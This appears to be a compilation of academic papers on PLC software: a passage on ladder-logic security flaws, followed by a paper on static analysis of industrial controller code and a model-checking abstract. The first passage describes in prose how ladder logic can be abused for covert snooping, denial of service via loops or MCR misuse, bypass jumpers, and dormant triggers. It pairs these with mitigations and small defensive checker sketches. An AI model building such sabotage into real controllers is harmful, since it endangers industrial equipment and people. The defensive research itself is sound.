PLCs generally contain a real-time operating system such as OS-9 or VxWorks [14]. If the OS is compromised by a hacker, the whole system can be completely taken over opening the door to varieties of malicious attacks and threats . 2) Ladder Logic Code: Ladder logic is the programming language that the code - logic - of the PLC programs is written in using special compilers or software. RSLogix5000, for instance, is a software used to write, edit, and compile ladder logic codes. The software uses IEC 61131-3 languages for the ,QWHUQDWLRQDO&RQIHUHQFHRQ&RPSXWHUDQG$SSOLFDWLRQV ,&& $  ,(((  Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:14 UTC from IEEE Xplore. Restrictions apply. logic, where IEC 61131-3 is an open international standard [15] for PLC programming Language. Every OEM vendor has its own PLC features and framework. While some are very advanced and allow several ways in writing logic, some others are very primitive and straightforward. However, Most of the PLCs ladder logic programs can be written as: Ladder Logic Diagrams (graphical); see Fig. 3(a). FBD: Functional Block Diagram (graphical); see Fig. 3(b). Structured Text (textual: XIO Examine if Open, XIC Examine if Closed, etc.) The most popular of the above code structure is ladder logic. I t is the program that controls, processes, and monitors all the parameters, inputs, outputs, and other decisions needed to run any automated or manually controlled devices or systems. Therefore, the code must be highly reliable with real-time data availability and high integrity to make prompt and precise logical calls and decisions. unlike some other high-level languages, ladder logic code is accessible and editable at any time even when the PLC is running without stopping or restarting the whole PLC ladder logic program. Therefore, any code vulnerabilities could lead to major catastrophic problems; even though the external environment is secure. III. LADDER LOGIC CODE VULNERABILITIES Not well structured and designed l adder logic code increases th e risks of vulnerabilities and security holes; even though the programmer is conforming to the company s standards and recommendations. And that could be more aggravated if the logic is not written by professional , experienced people; which is mostly the case. Standards are very subjective and are mainl y company oriented. Such standards are mainly created and instituted to keep systems functioning, well optimized, and saf e, but less attention is given to security threats and vulnerabili ties. Such cases create a back door to hackers or could inherit the PLC programs insecure and dormant or unnoticed threats. The following are some main examples of bad coding scenarios that any programmer should avoid. Ladder logic code vulnerabilities are summarized as follows: Using d uplicated instructions: reusing certain operands Such as: OTE, counters, timers, and JSR. more than once in the ladder code leads to undesired result. Fig. 4 shows an example of a duplicated OTE operand - Y1. The duplication in this logic makes Y1 triggered during its unintended time. The reason is that Y1 is going to be turned ON in the first rung and right away turns OFF if X2 is enabled. So, it goes ON or OFF based on the scanning result of the rung it belongs to. An unintended fluctuating value of an operand would make it hard to debug or notice. 
Snooping: ladder logic code can be written to log certain critical parameters and values, to be leaked stealthily for spying purposes without affecting the logic flow and purpose. This can be done by utilizing array instructions like FIFO and other array-based ones, e.g. Add-On user-defined instructions. Such instructions can be added to the code unnoticed and do not raise any suspicious or unusual behavior.

Fig. 1. SCADA vulnerability disclosures by year [4].
Fig. 2. SCADA and other component vulnerabilities [5].
Fig. 3. Ladder Logic Diagram (a) compared to FBD (b).
Fig. 4. Duplicating an OTE operand.

Missing certain coils or outputs: occurs when a rung is missing a specific output coil (such as OTEs, latches or sets, unlatches, etc.) on which other tag(s) depend; see Fig. 5. Missing coils increase the risk of vulnerability threats. It is a warning sign that someone could be deliberately tampering with the logic to deviate certain critical values, risking the system making wrong calls and decisions. Fig. 6 shows the proper way to handle OTE instructions, where each rung has its proper precondition and output operands. Y11, an OTE instruction, depends on the value of the normally open instruction Y2. Not having the Y2 instruction (deleted or replaced by a non-useful false instruction) as a precondition to Y11 makes the Y11 rung-condition-out false (Y11 always OFF). That would be hard to notice.

Bypassing: either by manually forcing the values of certain operands while the ladder logic is online, or by using empty branches (jumpers), as shown in Fig. 7.

DoS: a user can write online, or upload, a malicious piece of ladder logic to the PLC that might be activated or triggered at a certain time. That could slow down the PLC severely, totally halt it, or cause major faults, so that the operator cannot access the ladder logic, edit it, or monitor values in real-time. The attack can be done through:
- Coding repetitive SBR calls via JSR instructions.
- Coding an infinite loop via jumpers.
- Nesting timers and jumpers.
- Improperly inserting MCR (Master Control Reset) instructions that de-energize non-retentive instructions like OTE coils.
- Coding certain ladder logic that might lead to fatal errors or major faults.
Such faults might require restarting the PLC or re-uploading correct, clean ladder logic, which leads to data loss and a temporary shutdown of the whole automated system associated with that PLC. The recovery could be time consuming and might cause damage to some meticulous industrial activities or devices, in addition to the loss of critical parameters or values. One of the solutions for such problems is to monitor jumpers and other looping routines using counters and timers: if the loops run longer than expected, warn the operator and halt the suspicious routines.

Using hard-coded values: in certain situations, using hard-coded values or parameters endangers the process or its related program; see Fig. 8. Numeric values are easier to modify than those driven by continuous feedback. Modification can be on purpose, inadvertent, or by malicious attacks.
For instance, a programmer might enter a wrong value by mistake in the database table, where the values of the instructions are easily displayed and accessible; that could also happen by toggling the values of the instruction displayed in the rung. Fig. 9 shows a solution that can keep the numeric value of source B updated even if it is modified inadvertently by a toggle or by updating the values in the PLC database table.

Fig. 5. The tag Y2 is missing related input(s).
Fig. 6. Output instructions are properly energized.
Fig. 7. Using an empty branch as a jumper.
Fig. 8. Numeric values are vulnerable.
Fig. 9. Compare real-time numeric values, not hard-coded ones.

Racing: occurs when two pieces of code or operands of logic are racing against each other, leading to inconsistent results, and can be used to create a threat that could damage devices. Misplaced operands within the same code, or even within one rung, such as the racing scenario in timers, is a good example that often happens. Fig. 10 shows that having the done bit of the timer (tmr1), tmr1.DN, before the branch causes a racing problem when the timer's accumulator reaches the preset value (assuming X1 is always ON). In other words, whenever the timer (tmr1) is done, it is reset again and Valve01 is energized because the precondition, tmr1.DN, is false. There is always a chance that Valve01 will never get turned off or de-energized. That makes the problem hard to locate, because the logic looks legitimate. The proper correction is shown in Fig. 11.

Lack of thorough diagnostics and alarm messages: when there are no detailed and in-depth alarms, diagnostics, or preconditions, the devices might be at great risk, because the operator will only notice the damage after it occurs. Overall, the result is device damage or time delays in recovering, debugging, or maintaining. For instance, not setting an alarm message or warning for motor overload before enabling the motor, or while running it, could damage the motor, especially if the physical overload switch is compromised or does not exist. The problem is more aggravated if the compromised device is critical (e.g. a nuclear reactor) and yet lacks critical alarms or warnings. Another concern is when there are sufficient alarms and warning messages that can prompt the operator, but they get disabled, either through another wrong or malicious piece of logic or by an external user who manages to get through to the code. A good practice is to add ladder logic code that can simulate all fault scenarios and check that their status is alive before running production. Another good practice is to create a heartbeat pulse bit that flashes every 50 ms and is synchronized with the alarms program section.

Compiler warnings: overlooking certain PLC compiler warnings would be critical, since they might indicate a real threat; e.g. a compiler warns about duplicate outputs, Fig. 12.

Unused tags or operands: dormant malicious code or external attacks might take advantage of any unused tag, because such tags are already predefined and using them is stealthy and does not raise any flag. Many PLC programmers leave unused tags in the PLC database. A malicious attack can wait for the proper time and circumstances to trigger signals that might activate malicious outputs to interrupt or manipulate data. That can be done by utilizing instructions (timers, jumpers, etc.) that can overload the PLC OS, slow it down, truncate critical data, or generate certain datatype faults and errors.
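Like duplicated outputs, dormant tags can be surfaced mechanically. The following sketch is again only an illustration over invented inputs: it compares a declared tag list against the identifiers referenced in a textual export of the program and reports tags that are never used.

```python
# Illustration only (not a vendor tool): flag tags declared in the controller
# database but never referenced by the ladder logic export, since dormant tags
# are convenient hiding places for malicious logic.
import re

def find_unused_tags(declared_tags, rungs):
    referenced = set()
    for rung in rungs:
        referenced.update(re.findall(r"[A-Za-z_]\w*", rung))
    return sorted(set(declared_tags) - referenced)

declared = ["X1", "X2", "Y1", "Y2", "SpareTimer1", "DebugWord"]
program = ["XIC(X1) OTE(Y1)", "XIC(X2) OTE(Y2)"]
print(find_unused_tags(declared, program))   # ['DebugWord', 'SpareTimer1']
```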
Program Mode: keeping the PLC in Program Mode or Unlocked Mode allows others to intentionally or inadvertently upload wrong or malicious ladder logic code, jeopardizing the whole automated system. A user can even wipe out the whole ladder logic program or upload any suspicious one. Also, keeping the PLC in Program Mode makes the PLC vulnerable to any code manipulation, with no need to delete or overwrite the whole program. It allows others to do online editing of the ladder logic (adding or deleting pieces of code or data) while the ladder logic is running. That can be done by any user without being noticed, since there is no need to do a critical ladder logic code upload to the PLC; only critical uploads usually cause systems to stop and reset.

Lack of authentication: no authentication is conducted before uploading new or modified ladder logic code to the PLC. Attackers can use this to upload malicious, vulnerable, or improper code, or they can even compromise the PLC. To avoid this, software such as comparison tools should be used to ensure the integrity of critical pieces of code by comparing them to the original program.

Fig. 10. Racing condition.
Fig. 11. Racing condition solved.
Fig. 12. Compiler warning.

IV. LADDER LOGIC - BACKDOORS

Many companies and vendors assume that ladder logic is secure and not accessible by hackers and intruders because PLC networks are usually air-gapped. But that is not true, for the following reasons:

Random threats: a malicious attack could be carried out by a floating malware that is designed to affect certain PLC brands. It is deployed remotely, by USB, or locally by an infected PC on the PLC network. Such attacks could be initiated on purpose or inadvertently. Isolating PLC networks completely from others is not realistic, because there is always a need to connect a PC or HMI (which could be infected) to a PLC when a programmer needs to monitor or edit ladder logic.

Internal threats: could be due to upset employees, bad coding practice, infected logic written on an infected PC, or intentional attacks, e.g. giving remote access to hackers, opening certain ports, or inserting an infected USB device.

External threats: external stealthy access to the PLC code, either to keep a malicious piece of code dormant and trigger it at the proper time, or as a "hit and run" scenario. Dormant pieces of logic could be used to steal sensitive information and parameters, which could be used later on to sabotage or damage automated systems.

V. CONCLUSION

The vulnerabilities of PLCs are growing, leading to an increasing risk of threats and attacks. There are few works and only scattered local efforts involved in improving PLC ladder logic code, and challenges remain. In this paper we have solely focused on the code-level vulnerabilities of the ladder logic that resides and runs on PLCs. The paper provides a summary and details of some major, fundamental ladder logic code vulnerabilities and threats. Those vulnerabilities might exist in any typical ladder logic program: unnoticed, unknown, or never thought of.
Ladder logic code vulnerabilities could be dormant threats that can be triggered at any time, risking the whole automated system they are associated with. Even though code vulnerabilities could occur because of bad coding practice, some might be unknown even to professional programmers. In addition, we have provided solutions for the vulnerabilities mentioned above. Following the solutions and recommendations provided would highly mitigate, reduce, or eliminate malicious attacks or threats.

REFERENCES

[1] R. Langner, "Stuxnet: Dissecting a cyberwarfare weapon", IEEE Security & Privacy, 2011; 9(3): 49-51.
[2] T. Nash, "Backdoors and Holes in Network Perimeters: A Case Study for Improving Your Control System Security", Vol 1.1, August 2005, Vulnerability and Risk Assessment Program, Lawrence Livermore National Laboratory, UCRL-MI-215398.
[3] J. Weiss, "Stuxnet: Cybersecurity Trojan Horse", InTech, 2010.
[4] A. Gostev, "The Flame: Questions and Answers", Securelist Blog, Kaspersky, May 2012. https://www.securelist.com/en/blog/208193522/The_Flame_Questions_and_Answers
[5] https://threatpost.com/blackenergy-malware-used-in-attacks-against-industrial-control-systems/109067/ (October 29, 2014). [Accessed 17/02/2018]
[6] R. M. Lee, M. J. Assante, and T. Conway, "Analysis of the Cyber Attack on the Ukrainian Power Grid", Technical report, E-ISAC, 2016.
[7] "Overload: Critical Lessons from 15 Years of ICS Vulnerabilities", https://www2.fireeye.com/rs/848-DID-242/images/ics-vulnerability-trend-report-final.pdf, August 2016.
[8] Kaspersky Lab, "Industrial Control Systems Vulnerabilities Statistics", 2015. https://kasperskycontenthub.com/securelist/files/2016/07/KL_REPORT_ICS_Statistic_vulnerabilities.pdf
[9] Symantec Corporation, "Internet Security Threat Report | Appendices", Volume 21, April 2016.
[10] S. Valentine and C. Farkas, "Software Security: Application-Level Vulnerabilities in SCADA Systems", IRI 2011.
[11] Z. Zhang, W. Susilo, R. Raad, "Mobile ad-hoc network key management with certificateless cryptography", Signal Processing and Communication Systems (ICSPCS 2008), 2nd International Conference on, IEEE, 2008.
[12] S. Qazi, R. Raad, Y. Mu, W. Susilo, "Securing DSR against wormhole attacks in multirate ad hoc networks", Journal of Network and Computer Applications, Vol. 36, 2, pp. 582-592, Elsevier, 2013.
[13] S. Qazi, R. Raad, Y. Mu, W. Susilo, "Multirate DelPHI to secure multirate ad hoc networks against wormhole attacks", Journal of Information Security and Applications, Volume 39, pp. 31-40, Elsevier, 2018.
[14] "PLC Security Risk: Controller Operating Systems - Tofino Industrial Security Solution", www.tofinosecurity.com.
[15] https://www.isa.org/standards-publications/isa-publications/intech-magazine/2012/october/system-integration-iec-61131-3-industrial-control-programming-standard-advancements/
Applying_static_code_analysis_on_industrial_controller_code.pdf
Static code analysis techniques are a well-established tool to improve the efficiency of software developers and for checking the correctness of safety-critical software components. However, their use is often limited to general-purpose or mainstream programming languages. For these languages, static code analysis has found its way into many integrated development environments and is available to a large number of software developers. In other domains, e.g., for the programming languages used to develop many industrial control applications, tools supporting sophisticated static code analysis techniques are rarely used. This paper reports on the experience of the authors while adapting static code analysis to a software development environment for engineering the control software of industrial process automation systems. The applicability of static code analysis for industrial controller code is demonstrated by a case study using a real-world control system.
Applying Static Code Analysis on Industrial Controller Code

Stefan Stattelmann, Sebastian Biallas, Bastian Schlich, and Stefan Kowalewski
ABB Corporate Research Germany, Ladenburg, Germany. Email: [email protected]
Embedded Software Laboratory, RWTH Aachen University, Aachen, Germany. Email: [email protected]

I. Introduction

In industry, automation and control tasks are frequently operated using programmable logic controllers (PLCs). This paper describes the experience of the authors while adapting the Arcade.PLC framework (Aachen Rigorous Code Analysis and Debugging Environment for PLCs), as described by Biallas et al. in [1], for use with the ABB Compact Control Builder control application development environment. The goal of this project was to apply static analysis techniques to programming languages of the IEC 61131-3 standard [2] used in ABB Compact Control Builder, in order to improve the development process of control applications.

Software development environments for IEC 61131-3 languages often lack any support for static code analysis, except for error messages during compilation. There are some commercial tools available for checking syntactic properties of control applications or individual modules. However, these tools only check very basic properties (e.g., coding guidelines) [3] and are not integrated into the development environment. While the latter is often intended, e.g., to avoid recertification of safety-related software tools, the very basic nature of existing tools might also be rooted in a lack of awareness about the capabilities of formal methods in the automation domain. Improving this awareness was part of the motivation for the work described in the following.

II. ABB Compact Control Builder and Arcade.PLC

ABB Compact Control Builder is an ABB tool to develop control applications for AC 800M automation controllers. This family of control devices is used for the automation of complex industrial processes, e.g., in the chemical industry. While the core languages used in Compact Control Builder are a subset of the languages defined in IEC 61131-3, there are certain extensions to the standard. These include instantiation rules, e.g., singleton function blocks, and means to specify the order in which function blocks in an aggregated type are executed.

One distinguishing factor of the AC 800M controller, and thus the respective Control Builder tools, is the use of native code execution. This means that all control programs are compiled from source code into binary machine code before deploying them to the controller. This includes all function block types and other modules provided as reusable libraries, except for certain firmware functions. The latter are part of the runtime environment of the controller. However, Compact Control Builder libraries are not distributed in compiled form, but as source code. To avoid modifications and inappropriate use of library components by control engineers developing a control application, the source code files are encrypted. Depending on the level of protection, this encryption can include only the internal code or the complete interface of the components. In both cases, Compact Control Builder decrypts the libraries to perform the compilation from source code into native code.

Arcade.PLC is a framework for the analysis and verification of programs for PLCs. Unmodified PLC programs in the languages Instruction List, Function Block Diagram, and Structured Text can be supplied by the user of the tool.
Then, one function, function block or program can be selected for model checking or static analysis. Arcade.PLC allows for specifying the intended functionality of function blocks or control programs using different logics as specification language. The integrated model checker can then prove or refute that a program conforms to the given specification. The other key aspect of Arcade.PLC is static analysis using abstract interpretation [4], which is the main focus of this paper.
Figure 1 depicts the static analysis process of Arcade.PLC. Each program is first translated into an intermediate representation (IR). This IR only contains simple instructions (assignments, jumps, conditional jumps, calls). It normalizes different PLC languages and simplifies further analyses. Then, a control flow graph (CFG) is built from the IR. This CFG is then analyzed with a flow-sensitive, partly context-sensitive abstract interpretation framework that annotates each node of the CFG with abstract values for the relevant variables. This information is processed by the check engine, which executes a set of predefined checks. If a violation is detected, the IR is mapped back to the original source code position and the warning is presented to the user.

Fig. 1. The static analysis process of Arcade.PLC [5]

III. Non-Technical Challenges
A. Understanding the Domain
Understanding the domain of industrial automation is a key challenge for deploying static analysis techniques in this context. One very important aspect is that the development practices for control applications differ from those used in companies only dealing in software. The different approach to software development in the automation domain prohibits applying existing off-the-shelf solutions for general purpose programming languages. One very obvious reason for this is the use of domain-specific programming languages, e.g., those defined in IEC 61131-3, but the differences go beyond that.
In most cases, control programs aim to mimic the real world and the components they are interacting with. This leads to a software development process which is based on frequent reuse of standard components to control certain parts of the system. When a program is written for a concrete system, these components are just instantiated, configured, and connected in an appropriate way. As the developer of an application might not know all internal details of the instantiated components, there is a large potential for programming errors.
On the other hand, the relative simplicity of the IEC 61131-3 languages makes them attractive for analysis. The troublesome features of other programming languages, e.g., pointers, references, and dynamic memory allocation, are not present in these languages. When looking at real-world code, however, this claim is somewhat softened, as there are extensions which introduce these features. Overall, the semantics of the languages used in control applications is straightforward and thus, they are easy to analyze.

B. Expectations vs. Reality
While most development environments for control applications claim to follow the IEC 61131-3 standard [2], in practice each vendor modifies and extends the programming languages defined in the standard.
This also applies to ABB Compact Control Builder. One very obvious deviation from the IEC 61131-3 standard is that the interface and the internal variables of a function block are not defined in the source code itself, but using specialized tables which are part of the development environment. Thus, this information has to be extracted from proprietary XML files. It can also be accessed using a special interface based on .NET technology. As Arcade.PLC is based on Java, we chose not to use this interface and to work on the XML files directly. We encountered one intricate extension which makes Compact Control Builder programs syntactically incompatible with the existing Structured Text parser in Arcade.PLC: for a certain type of variable, it is possible to append the suffix :status to scan their internal state. As the operator ':' can usually only occur within switch statements, the existing parser reported the use of this feature as an error.
One important lesson we learned is that, in the end, real-world code is the best way to learn how software developers in a certain domain write code. Therefore, it is also the best way to identify the common use of programming languages as well as corner cases, which usually come with little documentation. Extensions like the previously described examples exist in many other development tools used in the automation domain as well.

C. Access to Real-World Code
The automation domain, in particular in the form of Compact Control Builder, comes with additional pitfalls when accessing source code for analysis. These pitfalls have organizational and historical reasons. While all function block libraries are distributed as source code, the libraries are protected by encryption to avoid modification of the source code by the users of a library. This protection was introduced since modification by control engineers led to problems when different versions of a library were used for control applications which were relying on unofficial patches. Essentially, the fact that this encryption feature is necessary highlights that there is a lot of potential for improvement in the development process of control software.
The missing information in encrypted libraries directly translates into a technical challenge: since libraries can be completely encrypted, even the signatures of the function blocks in some libraries are not available to an external tool. Thus, the static analysis engine must derive an appropriate signature for types from encrypted libraries based on the way they are used in the unencrypted parts of the source code. During the adaptation of Arcade.PLC for ABB Compact Control Builder, it was often not clear whether warnings were triggered by flaws in the analysis or by missing information. This in turn led to a large amount of manual inspection of the source code. This issue could have been resolved by using unencrypted versions of the respective libraries, but this was not possible for all of them in the course of the project.

IV. Technical Challenges
A. Hidden Complexity
At first glance, many control applications seem like a straightforward composition of relatively simple program organizational units (POUs) with a dedicated functionality. However, since a control program can consist of many hundreds of POUs, the total number of lines of code in a program easily reaches tens of thousands. Furthermore, function block instances have their own internal variables and can interact through global variables. Thus, the state space to be handled by a static analysis tool can be very large.
This complexity prohibits the use of simplistic analysis techniques for real-world applications. Additionally, the way function block calls are handled introduces even more variables: there are basically two ways to call a function block in most PLC languages. In the first version, input and output parameters are passed directly (either given formal parameter names or as values only). Another, semantically equivalent way to call a function block is to access the input and output parameters outside the call, such as:

    functionblock.input1 := 1;
    functionblock.input2 := a;
    functionblock();
    result := functionblock.output;

When implementing a static analysis which considers the data flow between function blocks, the above syntax entails that the input and output variables of every function block instance are accessible from its parent function block. For programs of realistic size, this makes the potential state space to be covered by an accurate static analysis very large. To reduce the number of variables which have to be tracked, we use a pre-analysis for determining which variables of a function block are actually accessed in the remainder of the program [5] and only consider these variables during the analysis. This technique enables the analysis of complex programs in Arcade.PLC while still providing very accurate results, e.g., with respect to the possible value ranges of variables.

B. Identifying Useful Analyses
During the adaptation of Arcade.PLC for Compact Control Builder we implemented checks for the following runtime errors and code smells:
- Conditions with constant result
- Illegal access into arrays or structured data types
- Variables with constant values
- Missing case labels in switch statements
- Unreachable code
- Division by zero
Most of these checks are based on well-known static analysis techniques and all of them are clearly useful from an academic perspective. However, not all of these checks yielded equally usable results in practice. All of these checks rely on the capability of Arcade.PLC to approximate the possible value range for all variables in a program. Based on this information, the additional checks can derive further properties of a control program, e.g., that a conditional statement always yields the same result or that the value of a variable is constant. The remainder of this section will focus on the first three checks.
With respect to the check for conditions yielding a constant result, the following piece of control code shows a pattern which we frequently encountered during our case study:

    42 If CONDITION1 Then
    43     OUTPUT := 65535;
    44 ElsIf CONDITION2 Then
    45     OUTPUT := INPUT1 And (INPUT2 Or (INPUT3 Xor 65535));
    46 ElsIf Not CONDITION2 Then
    47     OUTPUT := INPUT1 And (INPUT2 Or (INPUT3 Xor 0));
    48 End_If;

Checking the condition in line 46 is obviously superfluous, as it is the negation of the condition checked in line 44. Since line 46 can only be reached if the condition in line 44 is false, its condition will always be true. A simple else-statement would thus suffice in line 46 to preserve the original semantics of the code. Nonetheless, Arcade.PLC correctly reported that the condition in line 46 yields a constant result.
However, since essentially every else-statement in the projects we analyzed was written in this way, this resulted in a larger number of reported warnings which were not real problems in the code. Thus, we ultimately chose to deactivate the analysis for conditions with constant results to make the number of warnings manageable.
In addition, Compact Control Builder programs can make use of the firmware functions GetStructComponent and PutStructComponent. They allow accessing the n-th component of a structured data type. If n is less than 1 or greater than the number of elements in the structured data type, a runtime error is signaled during program execution. It is also checked whether the accessed element has the wrong type. To allow for offline checking of the correct usage of these functions, Arcade.PLC first determines the value range of the index expression of the respective calls. This is then used to check whether there are structure elements for all possible values of the index expression. If this is not the case, a warning is issued. Additionally, it is also checked whether all structure elements in the range described by the index expression have the correct type. The first check is only an adaptation of a well-known array-index-out-of-bounds check to these firmware functions. The second check, however, is a domain-specific analysis which is able to detect an additional class of runtime errors statically.
Two checks for constant variables were added to Arcade.PLC. The basic version only checks whether a variable never changes its value over the execution of the program, while the more advanced version checks whether the constant variable is also used in a statement which should modify its value, e.g., an assignment. The first variant only indicates a stylistic issue, while the second variant usually indicates a more severe problem in the code. During our case study, we encountered one function block where both types of warnings for constant variables were triggered. The respective variables were declared as follows:

    CLOCK : time := T#1m;
    COMPARE : int := 5;

The first variable CLOCK is a rather typical constant containing the value 1 minute and is used as a parameter for, e.g., timers. Compact Control Builder offers the possibility to declare constants as so-called project constants, such that they are no longer variables. For projects that make use of this feature, this warning could identify other candidates that should be moved into the project constants. However, during our case study we learned that this is often intentionally not done, in order to be able to adjust certain values during commissioning of a system.
For the other variable COMPARE, the warning was triggered that this variable contains a constant value, but is also written. It is only written in the following statement:

    COMPARE := max(COMPARE, 2);

Since COMPARE is initialized to 5, the call to max will return 5, which, in turn, will not change the value of the variable. The above example illustrates how the results of static analyses can interact to implement further checks. The information about the constant value of COMPARE is combined with the information that COMPARE is used in an assignment statement. Furthermore, the example also demonstrates that the software engineering practices used for the development of control applications, e.g., using variables to store constants which can be fine-tuned during commissioning, have a significant impact on the usefulness of certain static analyses.
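To make the relationship between the value-range approximation and the checks discussed in this section more concrete, the following Python fragment gives a minimal sketch of the underlying idea. It is not the Arcade.PLC implementation: the interval domain, the helper names (Interval, eval_less_than, check_program) and the example inputs are assumptions introduced purely for illustration.

    # Minimal sketch (not the actual Arcade.PLC implementation) of how a
    # value-range analysis can feed a "condition with constant result" and a
    # "variable with constant value" check. Variable ranges are modeled as
    # closed integer intervals; all names are hypothetical.

    from dataclasses import dataclass

    @dataclass(frozen=True)
    class Interval:
        lo: int
        hi: int

        def is_constant(self) -> bool:
            return self.lo == self.hi

    def eval_less_than(a: Interval, b: Interval):
        """Return True/False if the comparison a < b is decided by the
        intervals alone, or None if both outcomes are still possible."""
        if a.hi < b.lo:
            return True
        if a.lo >= b.hi:
            return False
        return None

    def check_program(ranges: dict, conditions: dict):
        """ranges: variable name -> Interval computed by the abstract
        interpretation; conditions: condition label -> (lhs, rhs) names."""
        warnings = []
        for var, itv in ranges.items():
            if itv.is_constant():
                warnings.append(f"variable '{var}' always has value {itv.lo}")
        for label, (lhs, rhs) in conditions.items():
            verdict = eval_less_than(ranges[lhs], ranges[rhs])
            if verdict is not None:
                warnings.append(f"condition '{label}' ({lhs} < {rhs}) is always {verdict}")
        return warnings

    if __name__ == "__main__":
        ranges = {"COMPARE": Interval(5, 5), "LIMIT": Interval(10, 20)}
        conditions = {"line 44": ("COMPARE", "LIMIT")}
        for w in check_program(ranges, conditions):
            print(w)

A real check engine would compute the intervals by abstract interpretation over the CFG and would support all comparison operators, data types, and the domain-specific checks described above; the sketch only shows how decided intervals translate into warnings.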
V. Case Study
After adapting Arcade.PLC, we were able to successfully apply it to a real-world control project comprising multiple networked PLCs. This project consisted of roughly 20 applications and about 50,000 lines of Structured Text (ST) code. The applications are further partitioned into programs, which share access to the same set of global variables. The programs and function blocks had between 100 and 3500 lines of ST and the programs contained up to 100 function block instances. Each of the applications had about 1000 global variables. Thus, analyzing the possible value ranges for all variables in the project was particularly challenging. Nonetheless, the complete runtime of the static analysis and the check engine on the entire project was only about 10 minutes.
The anonymized results of a sample application from this case study are shown in Tab. I. The table shows the program we checked, the lines of ST code of the program (not including functions and function blocks used in the program), the number of function blocks used (#FBs), the time for running the static analysis, the number of warnings in the main program (#W1), the number of warnings in other program organization units (e.g., function blocks) of the program (#W2), and the number of false positives (#FP) in #W1.

TABLE I. Part of the case study with anonymized program names
Program         | #loc | #FBs | time  | #W1 | #W2 | #FP
App1 / Program1 |  233 |    3 | <1 s  |   6 |   0 |   0
App2 / Program2 | 2776 |  100 | 11 s  |   0 |   8 |   0
App2 / Program3 |  169 |    5 |  3 s  |   0 |   0 |   0
App2 / Program4 | 2684 |  100 | 146 s |   0 | 301 |   0
App2 / Program5 |  206 |   12 | <1 s  |   0 |   0 |   0
App3 / Program6 |  344 |   12 | <1 s  |   3 |   0 |   0
App4 / Program7 | 3339 |   18 | 40 s  |   9 |  50 |   9

All our checks were configured in such a way that they could trigger in every location of the program, including the function blocks that are used in the program. This, however, triggered warnings in these function blocks (summarized in #W2). These warnings were raised for conditions that were always true/false, resulting in unreachable code in the function block instance. They arise because not every functionality of a function block is necessarily used in the main program. A function block might, e.g., have an input Enable to control the activation of some function. If the main program always needs this function, this input is hard-wired to true, resulting in the warning "condition is always true" at the corresponding IF Enable THEN statement in the function block due to our context-sensitive analysis. Therefore, we disabled these warnings for the function block instances used in the main program. We also disabled the warning for constant variables and only raised warnings for constant variables that are also written.
After this fine-tuning, it turned out that the number of warnings and the number of false positives were reasonably low. The remaining warnings were stylistic issues, e.g., redundant compares and disabled code, which had to be inspected manually. We also found a copy&paste error in Program6, in which a wrong variable name was used in one place, causing unreachable code. In Program7, we got false positives for out-of-bounds accesses inside a loop. These false positives could be eliminated by introducing relational domains to our analysis, meaning also tracking the dependencies between variables. This is planned to be added in the future.

VI. Related Work
To the best of our knowledge, Bornot et al.
[6] were the first to describe static analysis techniques for PLC programs using an abstract interpretation framework which is similar to the one used in Arcade.PLC. Their approach, however, is limited to small programs written in Instruction List. Prähofer et al. [3] give an overview of different static code analysis techniques and their benefits for IEC 61131-3 programs. Their approach is concerned with detecting bad programming practices (naming conventions, program complexity, code smells, deadlocks), while our approach infers the possible values of all program variables to detect semantic programming errors. In their paper, they also give an assessment of the available commercial tools for static PLC code analysis, which, at the moment, seem to focus on syntactic checks only, e.g., compliance with certain naming conventions for variables.

VII. Conclusion
This paper reported on the adaptation of an academic tool for static code analysis to a development environment for real-world control applications. After overcoming a multitude of challenges, both technical and non-technical, we were able to apply static code analysis on a large software project for an industrial control system. What we learned is that when putting theory to practice, results will not always be as expected. Not every analysis which looks useful in theory can fulfill this promise in practice. On the other hand, looking at real-world code can inspire new analyses and triggers the need to optimize existing analysis techniques. We therefore believe that applying static analysis tools on large real-world projects helps tremendously in improving these tools. Whenever possible, information about the application domain should be considered. This includes considering the end user of an analysis tool. An ideal static analysis should be useful for someone who does not understand the underlying theories. Ultimately, practical usefulness trumps ideas which only exist on paper or can only be used by an expert in the field.

Acknowledgements
This work was supported, in part, by the DFG research training group 1298 "Algorithmic Synthesis of Reactive and Discrete-Continuous Systems" and by the DFG Cluster of Excellence on Ultra-high Speed Information and Communication, German Research Foundation grant DFG EXC 89. Further, the work of Sebastian Biallas was supported by the DFG.

References
[1] S. Biallas, J. Brauer, and S. Kowalewski, "Arcade.PLC: A verification platform for programmable logic controllers," in ASE 2012. ACM, 2012, pp. 338-341.
[2] International Electrotechnical Commission (IEC), "IEC 61131-3, Programmable Controllers - Part 3: Programming languages," 2003.
[3] H. Prähofer, F. Angerer, R. Ramler, H. Lacheiner, and F. Grillenberger, "Opportunities and challenges of static code analysis of IEC 61131-3 programs," in ETFA, 2012.
[4] P. Cousot and R. Cousot, "Abstract interpretation: A unified lattice model for static analysis of programs by construction or approximation of fixpoints," in POPL. ACM, 1977, pp. 238-252.
[5] S. Biallas, S. Kowalewski, S. Stattelmann, and B. Schlich, "Efficient handling of states in abstract interpretation of industrial programmable logic controller code," in WODES. Cachan, France: IFAC, 2014.
[6] S. Bornot, R. Huuck, B. Lukoschus, and Y. Lakhnech, "Utilizing static analysis for programmable logic controllers," in ADPM, 2000, pp. 183-187.
Applying_Model_Checking_to_Industrial-Sized_PLC_Programs.pdf
Programmable logic controllers (PLCs) are embedded computers widely used in industrial control systems. Ensuring that PLC software complies with its specification is a challenging task. Formal verification has become a recommended practice to ensure the correctness of safety-critical software, but is still underused in industry due to the complexity of building and managing formal models of real applications. In this paper, we propose a general methodology to perform automated model checking of complex properties expressed in temporal logics [e.g., computation tree logic (CTL) and linear temporal logic (LTL)] on PLC programs. This methodology is based on an intermediate model (IM) meant to transform PLC programs written in various standard languages [structured text (ST), sequential function chart (SFC), etc.] to different modeling languages of verification tools. We present the syntax and semantics of the IM, and the transformation rules of the ST and SFC languages to the nuXmv model checker passing through the IM. Finally, two real case studies of European Organization for Nuclear Research (CERN) PLC programs, written mainly in the ST language, are presented to illustrate and validate the proposed approach.

Index Terms: Automata, IEC 61131, model checking, modeling, nuXmv, programmable logic controller (PLC), verification.

